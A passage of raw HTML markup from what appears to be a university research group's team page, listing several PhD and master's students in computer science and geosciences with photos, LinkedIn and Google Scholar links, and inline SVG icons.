style-local-182-c107\">\n <!---->\n <!---->\n <h4 class=\"\">Jean Guo</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Student</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c111-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c112\">\n <!---->\n <!---->\n <h4 class=\"\">Anupam Sarker</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c117-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c118\">\n <!---->\n <!---->\n <h4 class=\"\">Ardavan Sassani</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Student, MS Graduate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=9KRgkCcAAAAJ&hl=en&oi=ao\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c123-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c124\">\n <!---->\n <!---->\n <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c129-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c130\">\n <!---->\n <!---->\n <h4 class=\"\">Basit Damilare Amuda</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c140-outer\">\n <div data-colibri-id=\"182-c140\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c140 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c141\" class=\"d-block style-854 style-local-182-c141 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Siv-photo.jpg\" class=\"wp-image-1860 style-854-image style-local-182-c141-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c141-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-850 style-local-182-c142 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c142\">\n <!---->\n <!---->\n <h4 class=\"\">Sivgech Heang</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c143\" class=\"h-text h-text-component style-851 style-local-182-c143 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c144\" class=\"h-text h-text-component style-902 style-local-182-c144 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c145\" class=\"style-855 style-local-182-c145 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sivgech-heang-91842618a\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c135-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c136\">\n <!---->\n <!---->\n <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n 